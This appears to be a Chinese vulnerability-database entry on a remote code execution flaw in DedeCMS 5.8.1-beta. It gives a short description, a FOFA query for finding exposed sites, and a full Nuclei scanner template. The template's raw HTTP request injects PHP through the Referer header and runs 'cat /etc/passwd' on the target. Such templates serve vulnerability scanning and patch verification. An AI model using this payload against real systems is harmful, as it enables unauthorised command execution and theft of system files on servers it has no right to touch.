dedecms-rce: DedeCMS 5.8.1-beta - Remote Code Execution

日期: 2025-08-01 | 影响软件: DedeCMS | POC: 已公开

漏洞描述

DedeCMS 5.8.1-beta is susceptible to remote code execution via a variable override vulnerability that allows an attacker to construct malicious code with template file inclusion without proper authorization, thus possibly obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials. fofa: app="DedeCMS"

PoC代码[已公开]

id: dedecms-rce

info:
  name: DedeCMS 5.8.1-beta - Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    DedeCMS 5.8.1-beta is susceptible to remote code execution via a variable override vulnerability that allows an attacker to construct malicious code with template file inclusion without proper authorization, thus possibly obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials.
  reference:
    - https://srcincite.io/blog/2021/09/30/chasing-a-dream-pwning-the-biggest-cms-in-china.html
    - https://sectime.top/post/1d114771.html
  classification:
    cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="DedeCMS"
    product: dedecms
    vendor: dedecms
  tags: dedecms,cms,rce,vuln

http:
  - raw:
      - |
        GET /plus/flink.php?dopost=save&c=cat%20/etc/passwd HTTP/1.1
        Host: {{Hostname}}
        Referer: <?php "system"($c);die;/*ref

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b1f40bfba656ea37b70c31ee9cd5455bbbbb8eb1c293c6541b8b908723d4764e022100eb5f11689e11cb51e9490cb328b69ffc808d36dc0e939762a09ae4ed8aea12f2:922c64590222798bb761d5b6d8e72950

相关漏洞推荐